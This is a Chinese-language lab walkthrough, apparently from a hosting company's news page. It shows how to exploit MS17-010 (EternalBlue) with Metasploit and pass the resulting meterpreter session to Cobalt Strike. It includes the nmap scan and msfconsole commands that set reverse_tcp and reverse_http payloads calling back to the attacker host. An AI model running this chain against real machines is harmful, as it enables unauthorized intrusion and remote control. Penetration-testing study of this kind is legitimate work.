您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進(jìn)行MSF和CobaltStrike聯(lián)動(dòng),內(nèi)容簡(jiǎn)明扼要并且容易理解,絕對(duì)能使你眼前一亮,通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。
攻擊機(jī):192.168.60.129 (kali)
受害機(jī):192.168.60.131
網(wǎng)關(guān):192.168.60.2
工具:nmap、metaspolit、cobaltstrike
首先部署受害主機(jī)調(diào)制網(wǎng)卡可以互相通信。
接下來(lái)部署web應(yīng)用服務(wù),搞的看起來(lái)像是真實(shí)的應(yīng)用服務(wù)器一樣哈
通過(guò)使用nmap信息收集發(fā)現(xiàn)開放端口445、3389及操作系統(tǒng)版本信息。
nmap -A 192.168.60.131
通過(guò)信息收集發(fā)現(xiàn)系統(tǒng)開放445端口,使用工具檢測(cè)是否存在ms17_010漏洞,發(fā)現(xiàn)存在。
接近著神器1 Metaspolit上場(chǎng)
首先打開msf,進(jìn)行漏洞利用
1.搜索利用漏洞模塊
search ms17_010
2.漏洞利用
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOST 192.168.60.131 set LHOST 192.168.60.129
獲得session
進(jìn)入meterpreter會(huì)話。
接近著神器2Cobaltstrike上場(chǎng)
如果覺(jué)得功能太少,也可以和Cobaltstrike聯(lián)動(dòng)
啟動(dòng)Cobaltstrike
現(xiàn)在獲得是一個(gè)MSF的meterpreter類型的session,且session id為1
在Cobaltstrike新建一個(gè)監(jiān)聽,配置如下:
在MSF中設(shè)置如下
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.60.129 set lport 12388 set session 1
exploit
這樣就可以看到在Cobaltstrike中獲取到了了MSF彈回的Meterpreter會(huì)話。
最后可以使用Cobaltstrike中集成的滲透模塊進(jìn)行進(jìn)一步的測(cè)試。
注:只有Meterpreter類型的session才能派生給Cobaltstrike。
上述內(nèi)容就是如何進(jìn)行MSF和CobaltStrike聯(lián)動(dòng),你們學(xué)到知識(shí)或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。